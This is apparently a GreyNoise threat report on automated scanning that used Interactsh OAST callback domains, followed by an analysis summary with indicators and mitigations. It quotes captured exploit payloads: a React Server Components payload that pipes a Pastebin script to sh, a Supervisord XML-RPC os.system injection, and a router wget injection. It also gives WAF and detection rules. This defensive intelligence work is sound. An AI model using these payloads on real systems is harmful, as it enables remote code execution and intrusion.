Full Report
Overview Between January 10, 2026 06:10 UTC and January 17, 2026 04:59 UTC, GreyNoise sensors recorded 8,126 HTTP sessions from 34 unique IP addresses containing Well-known Out-of-band Interaction Domain callbacks. The activity exhibits characteristics of automated vulnerability scanning, with payloads targeting React Server Components, Supervisord XML-RPC interfaces, and router command injection vulnerabilities. OAST domain extraction and decoding identified 273 Interactsh domains spanning 21 distinct campaign identifiers (k-sort values). The dominant campaign (k-sort: d5i159) generated 79 unique OAST domains and was responsible for 6,637 sessions (82% of total volume). JA4 fingerprint analysis reveals consistent tooling across the campaign, with the most prevalent combination (JA4T: 64240_2-4-8-1-3_1286_7 / JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000) observed in 1,853 sessions from a single IP address. The attack infrastructure demonstrates coordination, with the primary IP (146.70.211.244) conducting sustained scanning over an 11-hour period on January 16. TCP fingerprint analysis shows multiple encapsulation layers (MTU-derived MSS of 1286 indicates 174 bytes of overhead), consistent with VPN or nested tunnel usage. This technical profile is typical of automated security testing tools operating through anonymization infrastructure. Temporal Analysis Activity began at low volume (16 sessions on January 10), escalated moderately on January 11 (509 sessions concentrated in a single hour), then dropped to sporadic probing for three days before the primary campaign launched on January 16. Daily Session Distribution: Date Sessions Unique IPs Pattern 2026-01-10 16 3 Initial reconnaissance 2026-01-11 509 4 First burst (495 sessions in one hour) 2026-01-12 46 7 Scattered activity 2026-01-13 84 9 Sustained low-volume scanning 2026-01-14 329 11 Mid-level activity 2026-01-15 19 3 Minimal activity 2026-01-16 7,123 10 Primary campaign burst The January 16 activity shows sustained high-volume scanning from 09:00-14:00 UTC (808-865 sessions/hour) from the primary IP (146.70.211.244), followed by continued activity from multiple IPs through 22:00 UTC. The single-IP phase maintained consistent fingerprints, while the multi-IP phase (15:00-22:00 UTC) introduced fingerprint diversity, suggesting either tool configuration changes or involvement of additional scanning nodes. Decoded OAST timestamps from the primary campaign (d5i159) align closely with sensor observation times, indicating real-time exploitation attempts rather than replayed traffic. Campaign Analysis Campaign 1: M247 High-Volume Scanning (Primary) Sessions: 6,637 (82% of total) Unique IPs: 1 primary (146.70.211.244) Infrastructure: AS9009 (M247 Europe SRL), United States geolocation OAST Campaign: d5i159 (79 unique Interactsh domains) Dominant Fingerprints: JA4T: 64240_2-4-8-1-3_1286_7 (MSS 1286, Window 64240, Scale 7) JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 (GET, HTTP/1.1, 6 headers, lang:en) Duration: 11.5 hours (2026-01-16 09:07:54 to 20:39:36 UTC) Characteristics: Single-source sustained scanning with high request rate Campaign 2: DigitalOcean Burst Scanning Sessions: 495 (6% of total) Unique IPs: 1 (129.212.209.246) Infrastructure: AS14061 (DigitalOcean LLC), Singapore OAST Campaign: d5l5ce (76 unique Interactsh domains) Dominant Fingerprints: Multiple JA4H variants with same JA4T Duration: Single hour burst (2026-01-11 21:00 UTC) Characteristics: Rapid-fire scanning concentrated in 60-minute window Campaign 3: Namecheap Infrastructure Sessions: 310 (4% of total) Unique IPs: 1 (209.74.86.209) Infrastructure: AS22612 (Namecheap Inc.), United States OAST Campaigns: d5i66f (29 domains), others Fingerprints: Similar to Campaign 1 with variations Characteristics: Distributed over multiple days Minor Campaigns An additional 21 campaigns were identified with session counts ranging from 4-115, originating from Microsoft Azure, Cloudflare, various hosting providers, and residential ISPs. These exhibit less coordination and may represent opportunistic scanning or independent security testing. Payload Analysis Payload examination reveals three primary vulnerability classes being targeted: 1. React Server Components (RSC) Exploitation Exploit Type: Prototype pollution leading to remote code execution Sessions: ~300+ (detected in Campaign 1 and 2) Method: POST with multipart form-data exploiting __proto__ chain Payload Characteristics: - Manipulates React Server Actions response objects - Executes process.mainModule.require('child_process').execSync() - Downloads and executes shell script from Pastebin - OAST callback embedded in command execution chain Example payload fragment: {"then": "$1:__proto__:then", "status": "resolved_model", "_response": {"_prefix": "var res=process.mainModule.require('child_process') .execSync('curl https://pastebin.com/raw/wiH2CgiS | sh').toString('base64');" This targets CVE-2024-46982 (React Server Components RCE) and similar prototype pollution vulnerabilities in Next.js applications. 2. Supervisord XML-RPC Command Injection Exploit Type: Unauthenticated RPC command injection Sessions: ~200+ Method: POST to XML-RPC endpoint Payload Characteristics: - Exploits Supervisord’s supervisor.supervisord.options chain - Executes arbitrary OS commands via linecache.os.system - Uses nslookup with OAST domain for DNS exfiltration Example payload: methodCall> methodName>supervisor.supervisord.options.warnings.linecache.os.systemmethodName> params> param> string>nslookup d5i1596uchf9i3isbdq0t6ez1pwyw313h.oast.sitestring> param> params> methodCall> Targets CVE-2017-11610 (Supervisord XML-RPC RCE) and related vulnerabilities. 3. Router/IoT Command Injection Exploit Type: Web interface command injection Sessions: ~100+ Method: POST to administrative interfaces Payload Characteristics: - Targets /syscmd.htm and similar endpoints - Uses wget or curl with OAST domains - Common in router and embedded device exploitation Example payload: submit-url=/syscmd.htm&sysCmdselect=5&save_apply=Run+Command &sysCmd=wget+http://d5i1596uchf9i3isbdq0dp9iq3mzaiwqr.oast.site Likely targeting CVE-2024-XXXXX (various router command injection vulnerabilities). Payload Distribution Vulnerability Class Sessions Unique IPs OAST Domains React/Next.js RCE ~2,200 15 95 Supervisord RPC ~3,800 8 102 Router/IoT CI ~1,500 12 76 Other/Unknown ~626 11 N/A Infrastructure Analysis JA4 Fingerprint Clustering Analysis identified 150 unique JA4T+JA4H combinations, with clustering revealing tool consistency within campaigns: Cluster 1 (Campaign 1 Primary): - JA4T: 64240_2-4-8-1-3_1286_7 - JA4H: ge11nn06en00_0e5d97bc8ad6_* - Sessions: 1,853 - IPs: 1 (146.70.211.244 / AS9009) - Technical Notes: MSS 1286 indicates 174 bytes overhead (nested VPN), HTTP/1.1 with 6 headers Cluster 2 (Campaign 1 Secondary): - JA4T: 64240_2-4-8-1-3_1286_7 (same) - JA4H: ge11nn040000_532a1ee47909_* (4 headers, no Accept-Language) - Sessions: 321 - IPs: 1 (same as Cluster 1) - Technical Notes: Same TCP stack, reduced HTTP headers Cluster 3 (Campaign 2): - JA4T: 65535_2-4-8-1-3_1380_13 - JA4H: po11nn100000_2bce9f31eeb7_* (POST, 10 headers) - Sessions: 23 - IPs: 2 (Singapore DigitalOcean) - Technical Notes: Different TCP window (65535), higher window scale (13) Network Infrastructure Characteristics Top ASNs by Session Volume: ASN Organization Sessions IPs Type AS9009 M247 Europe SRL 6,708 2 Hosting AS14061 DigitalOcean LLC 495 1 Cloud AS22612 Namecheap Inc. 310 1 Hosting AS8075 Microsoft Azure 115 1 Cloud AS60223 Netiface 95 1 Hosting M247 Europe (AS9009) is a bullet-proof hosting provider frequently associated with automated scanning and low-reputation traffic. The infrastructure concentration suggests either a single operator with multi-provider redundancy or multiple actors sharing common tooling and OAST services. TCP Stack Analysis The dominant JA4T fingerprint (64240_2-4-8-1-3_1286_7) exhibits: - Window Size: 64240 (scaled to 8,222,720 bytes) - MSS: 1286 (unusually low, indicating 174 bytes overhead) - Options: MSS, SACK, Timestamp, NOP, Window Scale (Linux-typical ordering) MSS of 1286 is anomalous. Standard Ethernet MTU (1500) yields MSS of 1460. Observed MSS suggests: - 174 bytes overhead from multiple encapsulation layers - Likely nested VPN or tunnel configuration - Consistent with operational security practices for scanning infrastructure Attribution Assessment Confidence: Medium This activity is consistent with automated vulnerability scanning by security researchers, bug bounty hunters, or opportunistic threat actors using commercial/open-source tooling. Evidence supporting assessment: Tooling Indicators: Interactsh OAST service is publicly available and widely used by security testers Consistent fingerprints suggest automated scanning frameworks (Nuclei, custom scripts) Payload diversity indicates template-based exploitation attempts Infrastructure Patterns: M247 Europe (AS9009) is known for bulletproof hosting but also used by legitimate penetration testing services Use of cloud infrastructure (DigitalOcean, Azure) is common in both legitimate and malicious scanning Nested VPN configuration suggests operational security awareness Operational Behavior: Burst pattern on single day suggests scheduled/triggered scanning No evidence of post-exploitation activity (no callback responses observed) OAST usage for vulnerability confirmation is standard in both offensive security and threat actor TTPs What we know: - Activity originates from bullet-proof hosting and cloud infrastructure - Scanning targets known CVEs with OAST-based detection - Infrastructure demonstrates operational security (VPN tunneling) What we infer (lower confidence): - Single operator or coordinated group based on timing and infrastructure overlap - Purpose is vulnerability detection (could be defensive testing or offensive reconnaissance) - No evidence of successful exploitation or post-compromise activity in sensor data Network IOCs Primary IPs 146.70.211.244 AS9009 (M247 Europe SRL) US 6,637 sessions 129.212.209.246 AS14061 (DigitalOcean LLC) SG 495 sessions 209.74.86.209 AS22612 (Namecheap Inc.) US 310 sessions 13.67.116.60 AS8075 (Microsoft Azure) SG 115 sessions 195.24.236.36 AS60223 (Netiface) NL 95 sessions 146.70.147.100 AS9009 (M247 Europe SRL) US 71 sessions 45.150.108.195 AS62005 (BlueVPS OU) IL 56 sessions 104.28.246.4 AS13335 (Cloudflare Inc.) PT 56 sessions 45.129.231.10 AS213438 (ColocaTel Inc.) NL 39 sessions 72.60.104.48 AS47583 (Hostinger Intl) MY 37 sessions OAST Campaign Identifiers Top 10 Interactsh k-sort values (campaign identifiers): d5i159 - 79 domains (primary M247 campaign) d5l5ce - 76 domains (DigitalOcean burst) d5i66f - 29 domains (Namecheap) d5k6dd - 20 domains (mixed infrastructure) d5lcrl - 13 domains (minor campaign) d5jov6 - 10 domains (minor campaign) d5j0uu - 9 domains (minor campaign) 255cd5 - 4 domains (minor campaign) 20d5l5 - 4 domains (minor campaign) 2fd5l5 - 4 domains (minor campaign) JA4 Fingerprints (Detection Signatures) High-confidence indicators for primary campaign: JA4T: 64240_2-4-8-1-3_1286_7 JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 JA4H: ge11nn040000_532a1ee47909_000000000000_000000000000 Secondary campaign indicators: JA4T: 65535_2-4-8-1-3_1380_13 JA4H: po11nn100000_2bce9f31eeb7_000000000000_000000000000 OAST Domain Patterns Sample domains for detection (all Interactsh): *.oast.site *.oast.fun *.oast.live *.oast.me *.oast.pro Pattern: [a-z0-9]{32,40}\.(oast\.site|oast\.fun|oast\.live|oast\.me|oast\.pro) Detection Recommendations Block or alert on OAST callback domains in outbound DNS/HTTP traffic. Implement detection for *.oast.site, *.oast.fun, and related Interactsh domains. Legitimate security testing should be coordinated and expected; uncoordinated callbacks indicate unauthorized scanning or successful exploitation. Monitor for JA4 fingerprint combinations associated with this campaign. Deploy network sensors capable of JA4 fingerprinting and alert on primary indicators (JA4T: 64240_2-4-8-1-3_1286_7 combined with listed JA4H values) from unexpected sources. Prioritize patching for targeted vulnerabilities: CVE-2024-46982 (React Server Components RCE) - patch Next.js to latest versions CVE-2017-11610 (Supervisord XML-RPC RCE) - disable XML-RPC or update Supervisord Router/IoT command injection - audit administrative interfaces for command injection vulnerabilities Implement WAF rules for exploit patterns: Block POST requests to /__nextjs_original-stack-frame with __proto__ in body Block XML-RPC requests to /RPC2 containing supervisor.supervisord.options Rate-limit and inspect POST requests to /syscmd.htm and similar admin endpoints Alert on wget, curl, nslookup commands in URL-encoded POST bodies Review firewall rules for M247 Europe (AS9009) and other identified ASNs. Consider blocking or rate-limiting traffic from bullet-proof hosting providers unless business need exists. Audit for successful exploitation: Search logs for OAST domain callbacks in DNS queries, HTTP requests, or command execution logs. Any callback indicates the vulnerability is present and exploitable. GNQL Queries Find IPs targeting your organization with OAST domains: tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d Investigate M247 Europe infrastructure activity: metadata.asn:AS9009 last_seen:7d classification:malicious Search for React Server Components exploitation attempts: raw_data.web.paths:*__nextjs_original-stack-frame* last_seen:30d Find IPs using primary campaign fingerprints: metadata.fingerprint:"64240_2-4-8-1-3_1286_7" last_seen:7d Report Generated: 2026-01-17 Analysis Period: 2026-01-10 06:10:25 UTC to 2026-01-17 04:59:01 UTC Total Sessions Analyzed: 8,126 Unique Source IPs: 34 OAST Domains Identified: 273 (Interactsh) Campaigns Identified: 21
Analysis Summary
# Tool/Technique: Automated Vulnerability Scanning via OAST/Interactsh
## Overview
This refers to a coordinated, automated scanning activity observed over a week in January 2026, characterized by the use of Out-of-Band Application Security Testing (OAST) indicators, specifically Interactsh domains, to confirm vulnerabilities across multiple target classes. The activity appeared structured, involving dedicated infrastructure and targeting known dangerous vulnerabilities.
## Technical Details
- Type: Tool/Technique (Automated Scanning Framework)
- Platform: Web Servers (targeting React components), Linux/Unix Services (Supervisord), and Internet of Things (IoT)/Router interfaces.
- Capabilities: Exploiting RCE and command injection flaws via OAST callbacks for confirmation; utilizing anonymized/tunneled infrastructure (VPN/Nested Tunnels indicated by MSS 1286).
- First Seen: Initial reconnaissance observed January 10, 2026.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application
- T1190.001 - Exploit via Web Interface
- **TA0003 - Persistence** (If successful exploitation leads to persistence mechanism installation via downloaded scripts)
- T1547 - Boot or Logon Autostart Execution (Inferred if downloaded script sets persistence)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (HTTP/S used for payload delivery)
## Functionality
### Core Capabilities
- **Vulnerability Probing:** Enumerating web applications for specific flaws, including React Server Components (RSC) prototype pollution, Supervisord XML-RPC interfaces, and general router command injection.
- **OAST Confirmation:** Using embedded Interactsh domains (273 unique domains) within exploit payloads to trigger DNS/HTTP requests, thereby confirming successful remote code execution (RCE) or command injection (CI).
- **Payload Delivery:** Utilizing techniques like downloading and executing shell scripts from external sources (e.g., Pastebin) upon successful injection (seen in RSC exploitation).
### Advanced Features
- **Infrastructure Anonymization:** Utilization of multiple hosting providers, including bullet-proof hosting (M247 Europe SRL), combined with TCP fingerprint evidence (MSS 1286, 174 bytes overhead) suggesting nested VPN or tunnel usage for operational security.
- **Campaign Coordination:** Highly focused primary campaign ($\text{k-sort: d5i159}$) driven by a single IP over 11 hours, indicating potentially scheduled or sophisticated automated testing.
- **Fingerprint Consistency:** Domination by a specific JA4 fingerprint ($\text{JA4T: 64240\_2-4-8-1-3\_1286\_7}$) suggests the use of consistent, controlled scanning tooling.
## Indicators of Compromise
- **File Hashes:** Not explicitly identified in the summary, though download of a shell script was observed.
- **File Names:** Shell script download (e.g., from `hxxps://pastebin.com/raw/wiH2CgiS`) followed by execution via `sh`.
- **Registry Keys:** Not applicable (Linux/Web application focused).
- **Network Indicators:**
- Primary Attacker IP: 146.70.211.244 (AS9009)
- Secondary Campaign IPs: 129.212.209.246 (AS14061), 209.74.86.209 (AS22612)
- OAST Domains (Interactsh): *.oast.site, *.oast.fun, *.oast.live, *.oast.me, *.oast.pro (all must be treated as interaction attempts).
- **Behavioral Indicators:**
- High-volume POST requests targeting application logic flaws using patterns like `__proto__:then` in multipart form-data.
- XML-RPC requests to service endpoints containing `supervisor.supervisord.options`.
- Utilization of `wget`, `curl`, or `nslookup` within command injection parameters targeting administrative paths (e.g., `/syscmd.htm`).
## Associated Threat Actors
Attribution is assessed as Medium confidence, suggesting:
1. Automated security testing tools (e.g., custom scripts, known scanners like Nuclei utilized in security research or bug bounty hunting).
2. Opportunistic threat actors utilizing readily available scanning tooling chains running through anonymity services.
No specific named threat group was identified beyond the infrastructure providers.
## Detection Methods
- **Signature-based detection:** Block or flag outbound DNS/HTTP traffic resolving to known Interactsh domains or the specific OAST patterns (`*.oast.site`, etc.).
- **Behavioral detection:** Alerting on the presence of payload fragments like `__proto__` within HTTP POST bodies targeting React/Next.js frameworks, or the chain `linecache.os.system` in XML-RPC payloads.
- **Fingerprint Detection:** Monitoring for the dominant $\text{JA4T: 64240\_2-4-8-1-3\_1286\_7}$ fingerprint originating from unexpected external hosts, especially when paired with malicious activity.
## Mitigation Strategies
1. **Patching:** Immediately apply patches for:
- CVE-2024-46982 (React Server Components RCE/Prototype Pollution) by updating Next.js.
- CVE-2017-11610 (Supervisord XML-RPC RCE) by disabling XML-RPC or updating Supervisord.
2. **WAF Implementation:** Deploy strict WAF rules to inspect and block:
- POST requests to Next.js endpoints containing `__proto__` references in the body.
- XML-RPC endpoint calls (`/RPC2`) containing sensitive system commands/options.
- Requests containing obvious command execution strings (wget, curl, nslookup inline) aimed at device administration paths (`/syscmd.htm`).
3. **Network Hardening:** Review and potentially rate-limit or block unsolicited traffic originating from known bullet-proof hosting ASNs like AS9009 (M247 Europe SRL).
4. **Auditing:** Check logs for internal DNS queries or external HTTP connections that match the observed OAST domain patterns, confirming if internal assets were successfully exploited.
## Related Tools/Techniques
- **Interactsh:** The OAST infrastructure used extensively for this campaign, indicating a tool or methodology employing this specific service.
- **Automated Scanning Tools:** Tools capable of fingerprinting TCP stacks consistently and chaining multiple vulnerability exploits (potential relevance to Nuclei or customized frameworks).
- **Tunneling/VPN Techniques:** The network stacking (MSS 1286) suggests the use of internal tools configured for low-level masking, common in dedicated scanning toolsets.